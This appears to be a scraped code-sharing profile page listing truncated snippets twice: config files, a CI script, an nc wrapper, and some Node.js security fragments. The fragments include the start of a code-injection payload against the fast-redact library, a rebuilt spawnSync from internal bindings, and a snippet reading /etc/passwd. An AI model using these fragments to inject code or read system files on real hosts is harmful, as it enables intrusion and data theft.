Francesco Soncina phra

## .phra.asc
-----BEGIN PGP MESSAGE-----
Version: GnuPG v2.0.19 (GNU/Linux)

jA0ECQMCw/LnvQztV8BgyewTel93SMoWhYsFecAR9qduEmOP07CmXS5x+YeDIrM5
C6AU+OMACCpqIjDBjRNeoH+b2t7VAPg6Niwh/9tAj8Me00zMrfyAP/dlpcVG/Sz4
vNbS2VFvgfp9OaQJy3kCssWB1QaocgfRVYrYkSIcshcj16m95ygwETXRrevwXS8/
6hlhSLOj/GX/2d0DksNaZQO5uxh88iusx+NRIcxOPIOLxGjiEd+rC0l6g4e0O40Y
fBNnShjUuBvSPK8RZmCFQ1E2Aukoq13cAA3acQcgnfgs2upKILyad/KdOvRX+o5p
gwjNZsiBU+Lz6sQ8EVUWk4hiMa6zKneu4KB0/xSj12e70YSXVMvy4tVWO2/Z5ca/
P5Btw64EEMIsOVAUlZEIQ5qMdeNPqkBBUHQ+i/mkKQe0jqkBq8DQKxz0ngQGuwtz

## docker-compose.yml
version: "3.6"

x-env:
  &env
  NGINX_SERVER_NAME: "$NGINX_SERVER_NAME"
  NGINX_EMAIL: "$NGINX_EMAIL"
  BRIDGE_VERSION: "$BRIDGE_VERSION"
  FEDERATION_VERSION: "$FEDERATION_VERSION"
  COMPLIANCE_VERSION: "$COMPLIANCE_VERSION"
  BRIDGE_PORT: "$BRIDGE_PORT"

## .env
# .env

# LETSENCRYPT STAGING ENV
# CHANGE IT TO true FOR DEVELOPMENT
LETSENCRYPT_STAGING=false

# PUBLIC
NGINX_SERVER_NAME=domain.com
NGINX_EMAIL=user@domain.com
BRIDGE_VERSION=0.0.30

## config.yml
- run: #STABLE
  name: Install Chromedriver latest version
  command: |
    sudo apt-get update
    sudo apt-get install lsb-release libappindicator3-1
    curl -L -o google-chrome.deb https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
    sudo dpkg -i google-chrome.deb
    sudo sed -i 's|HERE/chrome"|HERE/chrome" --no-sandbox|g' /opt/google/chrome/google-chrome
    rm google-chrome.deb

## chooseUser.js
const GREEN = 'green'
const YELLOW = 'yellow'
const RED = 'red'

const GREEN_WEIGHT = .2
const YELLOW_WEIGHT = .3
const RED_WEIGHT = .5

const people = [
  { user: 'user1', grade: GREEN },

## nca.sh
#!/usr/bin/expect
# nca - nc wrapper by SNADO team
# Requires: expect, nc and optionally tmux

set LISTEN false
set ADDR "0.0.0.0"
set PORT 0
set TMUX false
set UDP ""
set KILL true

## spawnSync.js
// Source: https://github.com/nodejs/node/blob/master/lib/child_process.js

// Defines spawn_sync and normalizeSpawnArguments (without error handling). These are internal variables.
spawn_sync = process.binding('spawn_sync'); normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined&&(a={}),a=Object.assign({},a),a.shell){const g=[c].concat(b).join(' ');typeof a.shell==='string'?c=a.shell:c='/bin/sh',b=['-c',g];}typeof a.argv0==='string'?b.unshift(a.argv0):b.unshift(c);var d=a.env||process.env;var e=[];for(var f in d)e.push(f+'='+d[f]);return{file:c,args:b,options:a,envPairs:e};}

// Defines spawnSync, the function that will do the actual spawning
spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:'pipe',readable:!0,writable:!1},{type:'pipe',readable:!1,writable:!0},{type:'pipe',readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0])

## validator.js
try {
  if (/〇/.test(s)) throw Error()
  const proxy = new Proxy({}, {get: () => proxy, set: () => { throw Error() }})
  const expr = s.replace(/^\*/, '〇').replace(/\.\*/g, '.〇').replace(/\[\*\]/g, '[〇]')
  if (/\/\*/.test(expr)) throw Error()
  /* eslint-disable-next-line */
  new Script(`
    o.${expr}
    if ([o.${expr}].length !== 1) throw Error()
  `).runInNewContext({o: proxy, 〇: null})

## fast-redact.exploit.js
const fastRedact = require('fast-redact')
const fauxRequest = {
  headers: {
    host: 'http://example.com',
    cookie: `oh oh we don't want this exposed in logs in etc.`,
    referer: `if we're cool maybe we'll even redact this`
  }
}
const redact = fastRedact({
  paths: ['headers.cookie', `a\n&& (function(){

## read-passwd.js
const buffer = Buffer.allocUnsafe(8192)
process.binding('fs').read(process.binding('fs').open('/etc/passwd', 0, 0600), buffer, 0, 4096)
console.log(buffer.toString())
	-----BEGIN PGP MESSAGE-----
	Version: GnuPG v2.0.19 (GNU/Linux)

	jA0ECQMCw/LnvQztV8BgyewTel93SMoWhYsFecAR9qduEmOP07CmXS5x+YeDIrM5
	C6AU+OMACCpqIjDBjRNeoH+b2t7VAPg6Niwh/9tAj8Me00zMrfyAP/dlpcVG/Sz4
	vNbS2VFvgfp9OaQJy3kCssWB1QaocgfRVYrYkSIcshcj16m95ygwETXRrevwXS8/
	6hlhSLOj/GX/2d0DksNaZQO5uxh88iusx+NRIcxOPIOLxGjiEd+rC0l6g4e0O40Y
	fBNnShjUuBvSPK8RZmCFQ1E2Aukoq13cAA3acQcgnfgs2upKILyad/KdOvRX+o5p
	gwjNZsiBU+Lz6sQ8EVUWk4hiMa6zKneu4KB0/xSj12e70YSXVMvy4tVWO2/Z5ca/
	P5Btw64EEMIsOVAUlZEIQ5qMdeNPqkBBUHQ+i/mkKQe0jqkBq8DQKxz0ngQGuwtz
	version: "3.6"

	x-env:
	&env
	NGINX_SERVER_NAME: "$NGINX_SERVER_NAME"
	NGINX_EMAIL: "$NGINX_EMAIL"
	BRIDGE_VERSION: "$BRIDGE_VERSION"
	FEDERATION_VERSION: "$FEDERATION_VERSION"
	COMPLIANCE_VERSION: "$COMPLIANCE_VERSION"
	BRIDGE_PORT: "$BRIDGE_PORT"
	# .env

	# LETSENCRYPT STAGING ENV
	# CHANGE IT TO true FOR DEVELOPMENT
	LETSENCRYPT_STAGING=false

	# PUBLIC
	NGINX_SERVER_NAME=domain.com
	NGINX_EMAIL=user@domain.com
	BRIDGE_VERSION=0.0.30
	- run: #STABLE
	name: Install Chromedriver latest version
	command: \|
	sudo apt-get update
	sudo apt-get install lsb-release libappindicator3-1
	curl -L -o google-chrome.deb https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
	sudo dpkg -i google-chrome.deb
	sudo sed -i 's\|HERE/chrome"\|HERE/chrome" --no-sandbox\|g' /opt/google/chrome/google-chrome
	rm google-chrome.deb
	const GREEN = 'green'
	const YELLOW = 'yellow'
	const RED = 'red'

	const GREEN_WEIGHT = .2
	const YELLOW_WEIGHT = .3
	const RED_WEIGHT = .5

	const people = [
	{ user: 'user1', grade: GREEN },
	#!/usr/bin/expect
	# nca - nc wrapper by SNADO team
	# Requires: expect, nc and optionally tmux

	set LISTEN false
	set ADDR "0.0.0.0"
	set PORT 0
	set TMUX false
	set UDP ""
	set KILL true
	// Source: https://github.com/nodejs/node/blob/master/lib/child_process.js

	// Defines spawn_sync and normalizeSpawnArguments (without error handling). These are internal variables.
	spawn_sync = process.binding('spawn_sync'); normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined&&(a={}),a=Object.assign({},a),a.shell){const g=[c].concat(b).join(' ');typeof a.shell==='string'?c=a.shell:c='/bin/sh',b=['-c',g];}typeof a.argv0==='string'?b.unshift(a.argv0):b.unshift(c);var d=a.env\|\|process.env;var e=[];for(var f in d)e.push(f+'='+d[f]);return{file:c,args:b,options:a,envPairs:e};}

	// Defines spawnSync, the function that will do the actual spawning
	spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:'pipe',readable:!0,writable:!1},{type:'pipe',readable:!1,writable:!0},{type:'pipe',readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0])
	try {
	if (/〇/.test(s)) throw Error()
	const proxy = new Proxy({}, {get: () => proxy, set: () => { throw Error() }})
	const expr = s.replace(/^\/, '〇').replace(/\.\/g, '.〇').replace(/\[\*\]/g, '[〇]')
	if (/\/\*/.test(expr)) throw Error()
	/* eslint-disable-next-line */
	new Script(`
	o.${expr}
	if ([o.${expr}].length !== 1) throw Error()
	`).runInNewContext({o: proxy, 〇: null})
	const fastRedact = require('fast-redact')
	const fauxRequest = {
	headers: {
	host: 'http://example.com',
	cookie: `oh oh we don't want this exposed in logs in etc.`,
	referer: `if we're cool maybe we'll even redact this`
	}
	}
	const redact = fastRedact({
	paths: ['headers.cookie', `a\n&& (function(){
	const buffer = Buffer.allocUnsafe(8192)
	process.binding('fs').read(process.binding('fs').open('/etc/passwd', 0, 0600), buffer, 0, 4096)
	console.log(buffer.toString())